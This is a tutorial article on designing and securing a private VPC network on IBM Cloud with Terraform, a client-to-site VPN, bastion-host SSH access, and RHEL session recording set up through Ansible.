In today's cloud world, security has taken precedence over resiliency and high availability. With the introduction of Virtual Private Cloud, network security has become even more critical. In this article, you will learn the best practices to make a virtual private cloud more private and secure than ever before.
By the end of this article, you will learn how to:
Let's explore best practices for designing and securing a Virtual Private Cloud (VPC) network in Cloud
By following these best practices, you can create a highly secure and resilient VPC. Regularly review and update your security measures to adapt to evolving threats and ensure ongoing protection of your cloud infrastructure. Implementing automation with tools like Terraform further enhances efficiency and consistency in managing your cloud resources.
This article uses IBM Cloud to deploy the VPC network using Terraform as the infrastructure as code automation. You can use any cloud provider to deploy the architecture as VPC is available on all the leading cloud vendors for network isolation.
Client-to-site VPN for VPC is one of the two VPN options available on IBM Cloud that provides a client-to-site VPN solution that allows users to connect to IBM Cloud resources through secure, encrypted connections.
● IBM Cloud API Key to provision cloud resources.
● Certificate's CRN from Secrets Manager to store VPN certificates.
● OpenVPN client to connect to client-to-site VPN from your local machine.
● Install and set up Terraform
Secrets Manager
export TF_VAR_ibmcloud_api_key=<IBM_CLOUD_API_KEY>
export TF_VAR_secrets_manager_certificate_crn=<SECRET_CRN>
git clone https://github.com/VidyasagarMSC/private-vpc-network
cd terraform
terraform init
terraform plan
terraform apply
● Once the VPC resources are successfully provisioned, you need to download the VPN client profile.
● Click the client to site tab and then on the name of the VPN
● Download the profile from the Clients tab
● The VPN provisioned through Terraform uses certificates. Follow the instructions here to connect to the ovpn client.
● You should see the successful connection on your OVPN client.
4. Verify the SSH Connection
ssh-add <LOCATION_OF_PRIVATE_SSH_KEY>
Example: ssh-add ~/.ssh/<NAME_OF_THE_PRIVATE_KEY>
ssh -J root@10.10.0.13 root@10.10.128.13
Command to connect from a bastion host in Zone 2 is ssh -J root@10.10.65.13 root@10.10.128.13
Remember, you should be connected to the client-to-site VPN to SSH into the RHEL VSI through the bastion host.
Try disconnecting the VPN and SSHing into the RHEL VSI.
A Bastion host and a jump server are both security mechanisms used in network and server environments to control and enhance security when connecting to remote systems. They serve similar purposes but have some differences in their implementation and use cases. The Bastion host is placed in front of the private network to take SSH requests from public traffic and pass the request to the downstream machine. Bastion hosts and jump servers are vulnerable to intrusion as they are exposed to public traffic.
Session recording helps an administrator of a system to audit user SSH sessions and comply with regulatory requirements. In the event of a security breach, you as an administrator would like to audit and analyze the user sessions. This is critical for a security-sensitive system.
Before deploying the session recording solution, you need to provision a private VPC network. Alternatively, if you are planning to use your own VPC infrastructure, you need to attach a floating IP to the virtual server instance and a public gateway to each of the subnets. Additionally, you need to allow network traffic from public internet access.
To be able to deploy the Session Recording solution you need to have the following packages installed on the RHEL VSI:
The packages will be installed through Ansible automation on all the VSIs, both bastion hosts and RHEL VSI.
cd ansible
2. Create hosts.ini from the template file.
cp hosts_template.ini hosts.ini
[bastions]
10.10.0.13
10.10.65.13
[servers]
10.10.128.13
[bastions:vars]
ansible_port=22
ansible_user=root
ansible_ssh_private_key_file=/Users/vmac/.ssh/ssh_vpc
packages="['tlog','cockpit-session-recording','systemd-journal-remote']"
[servers:vars]
ansible_port=22
ansible_user=root
ansible_ssh_private_key_file=/Users/vmac/.ssh/ssh_vpc
ansible_ssh_common_args='-J root@10.10.0.13'
packages="['tlog','cockpit-session-recording','systemd-journal-remote']"
4. Run the Ansible playbook to install the packages from an IBM Cloud private mirror/repository.
ansible-playbook main_playbook.yml -i hosts.ini --flush-cache
You can see in the image that after you SSH into the RHEL machine now, you will see a note saying that the current session is being recorded.
If you closely observe the messages post SSH, you will see a URL to the web console that can be accessed using the machine name or private IP over port 9090. To allow traffic on port 9090, in the Terraform code, Change the value of the allow_port_9090 variable to true and run terraform apply. The latest terraform apply will add ACL and security group rules to allow traffic on port 9090.
This article covered why session recording is required in bastion hosts for auditing and compliance and how session recording can be set up with the built-in RHEL packages using Ansible Automation.
While designing a secured virtual private cloud network, you learned the best practices in architecting a VPC private network. We also covered the need to build highly available VPN servers and bastion hosts. With the provisioning of cloud infrastructure using Terraform and Ansible for session recording, you got hands-on experience.
If you like my content, please check my website and give a follow on LinkedIN. Happy reading.